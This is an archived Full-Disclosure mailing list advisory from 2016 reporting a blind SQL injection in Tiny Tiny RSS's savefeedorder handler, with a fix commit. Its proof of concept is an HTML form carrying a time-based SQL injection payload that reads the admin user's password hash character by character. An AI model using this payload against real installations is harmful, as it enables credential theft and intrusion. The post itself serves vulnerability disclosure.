| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CACoXDXh3QYgd_o0wgJKee2a5mQ-JOthEmSPcU7wrWVFpT7-z_w@mail.gmail.com>
Date: Mon, 15 Feb 2016 16:04:46 +0100
From: Kacper Szurek <kacperszurek@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Tiny Tiny RSS Blind SQL Injection
# Exploit Title: Tiny Tiny RSS Blind SQL Injection
# Date: 15-02-2016
# Software Link: http://tt-rss.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$item_id inside process_category_order() is not properly escaped.
We control this value using $_POST['payload'].
http://security.szurek.pl/tiny-tiny-rss-blind-sql-injection.html
2. Proof of Concept
Login as regular user.
<form method="post" action="http://tiny-tiny-rss/backend.php">
<input type="hidden" name="op" value="pref-feeds">
<input type="hidden" name="method" value="savefeedorder">
<textarea name="payload">{"items":[{"items":{"_reference":"CAT:1' AND
order_id = (SELECT IF(substr(pwd_hash,1,1) = CHAR(77), SLEEP(5), 0) FROM
ttrss_users WHERE id = 1) AND -- "},"id":"root"}]}</textarea>
<input type="submit" value="Hack!">
</form>
3. Solution:
Update to version a5556c2471973e292dce615fe0c77fdbbc54405b
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists